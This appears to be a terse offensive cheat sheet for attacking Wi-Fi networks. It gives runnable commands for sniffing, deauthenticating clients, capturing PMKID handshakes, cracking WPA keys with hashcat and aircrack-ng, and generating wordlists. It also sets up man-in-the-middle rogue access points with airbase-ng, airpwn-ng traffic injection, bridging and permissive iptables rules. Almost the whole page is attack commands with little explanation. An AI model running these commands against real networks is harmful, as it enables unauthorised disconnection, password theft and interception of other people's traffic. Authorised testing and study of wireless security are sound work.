Wifi¶
Sniffing¶
airmon-ng start wlp2s0
airodump-ng -a -c <channel> --essid <ssid> -w mydump wlp2s0mon
airodump-ng -a -c <channel> --bssid <ap_mac> -w mydump wlp2s0mon
Deauth attack¶
aireplay-ng --deauth 1 -a <ap_mac> -c <client_mac> -h <spoof_src_mac> wlp2s0mon
PMKID attack¶
hcxdumptool -o mydump.pcap -i wlp2s0 --enable_status=3
hcxpcaptool -z test.16800 mydump.pcap
Cracking¶
hashcat and dictionary attack
hcxpcapngtool ~/balle.pcap-01.cap -o test.16800
hashcat -m 22000 -w 3 test.16800 mydict.txt
Bruteforce attack
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
Hybrid wordlist and bruteforce
hashcat -m 22000 -w 3 -a 7 -o cracked.txt test.16800 '?d?d?d?d?s' mydict.txt
Or using aircrack
aircrack-ng -w rockyou.txt mydump.pcap
For possible default password generators
And to generate a wordlist depending on a homepage
cewl -d 4 -m 8 <url> -w wordlist.txt
Automated security check¶
wifite is your friend
but manual checks are still better ;)
Man in the middle¶
Use wifiphisher
Or airpwn-ng with wpa2 support
airtun-ng -a <BSSID> -e <ESSID> -p <PSK> <Monitoring NIC>
ifconfig at0 up
python3 ./airpwn-ng -i <Injecting NIC> -m at0 --tun --injection payloads/demo --inj man
airpwn open network
python3 ./airpwn-ng -i <Injecting NIC> -m <Monitoring NIC> --injection payloads/demo
Or airbase-ng open network
airbase-ng -a <ap_mac> --essid <ssid> -c <channel> wlp2s0
echo 1 > /proc/sys/net/ipv4/ip_forward
dnsmasq
brctl addbr mitm
brctl addif mitm at0
brctl addif mitm <inet_iface>
ifconfig mitm up
iptables -F
iptables -F -t nat
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o <inet_iface> -j MASQUERADE